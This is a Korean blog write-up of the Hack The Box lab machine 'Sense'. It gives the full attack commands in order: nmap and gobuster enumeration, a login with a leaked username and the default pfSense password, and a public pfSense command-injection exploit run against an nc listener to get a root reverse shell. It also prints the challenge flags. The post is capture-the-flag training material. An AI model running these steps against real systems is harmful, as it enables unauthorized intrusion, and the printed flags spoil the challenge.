-
[HTB] Sense WriteupWargame/Hack The Box 2022. 1. 17. 17:57
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.255.245
443 port 에 lighttpd 서비스로 웹페이지가 활성화되어있는것을 알 수 있었다.
dirb, gobuster 등을 활용하여 웹페이지의 취약 포인트를 찾아보았다.
gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.129.255.245 -x php,txt,conf -o bigList
/system-users.txt 에서 계정정보로 추정되는 값을 확인 할 수 있었다.
password는 디폴트 값이므로 구글링 결과 pfsense 임을 알 수 있었다.
따라서, rohit / pfsense 로 로그인 할 수 있었고 버전 등 정보를 확인 할 수 있었다.
관리자 페이지 접근에 성공했으므로 pfsense, freebsd 등 키워드로 exploit 코드를 찾았고,
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection(43560.py) 를 활용하기로 했다.
searchsploit freebsd searchsploit pfsense searchsploit -m 43560
nc -nvlp 1234 python3 43560.py --rhost 10.129.255.245 --lhost 10.10.14.80 --lport 1234 --username rohit --password pfsense
바로 루트 권한의 ReverseShell을 획득 할 수 있었고 문제를 해결했다.
FLAG =
[user] 8721327cc232073b40d27d9c17e7348b
[root] d08c32a5d4f8c8b10e76eb51a69f1a86
반응형'Wargame > Hack The Box' 카테고리의 다른 글
[HTB] Jerry Writeup (0) 2022.01.22 [HTB] Arctic Writeup (0) 2022.01.19 [HTB] Beep Writeup (0) 2022.01.16 [HTB] Granny Writeup (0) 2022.01.13 [HTB] Optimum Writeup (0) 2022.01.11